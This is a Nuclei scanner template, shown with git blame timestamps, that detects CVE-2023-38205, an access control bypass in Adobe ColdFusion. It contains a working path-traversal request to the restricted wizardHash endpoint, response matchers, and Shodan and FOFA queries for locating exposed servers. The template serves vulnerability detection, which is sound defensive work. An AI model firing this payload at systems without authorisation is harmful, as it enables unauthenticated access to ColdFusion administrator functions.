nuclei-templates/http/cves/2023/CVE-2023-38205.yaml

45 lines
1.6 KiB
YAML
Raw Normal View History

2023-07-19 21:25:31 +00:00
id: CVE-2023-38205
info:
name: Adobe ColdFusion - Access Control Bypass
author: DhiyaneshDk
severity: high
description: |
There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the necessary security patches or updates provided by Adobe to mitigate this vulnerability.
2023-07-19 21:25:31 +00:00
reference:
- https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/
- https://helpx.adobe.com/security/products/coldfusion/apsb23-47.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-08-31 11:46:18 +00:00
cve-id: CVE-2023-38205
2023-07-19 21:25:31 +00:00
cwe-id: CWE-284
metadata:
2023-07-21 11:51:37 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-07-19 21:25:31 +00:00
vendor: adobe
2023-09-06 11:43:37 +00:00
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
2023-08-31 11:46:18 +00:00
tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev
2023-07-19 21:25:31 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
matchers-condition: and
matchers:
- type: regex
regex:
- ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}
- type: dsl
dsl:
- contains(content_type, "text/html")
- status_code == 200
- len(trim_space(body)) == 106
condition: and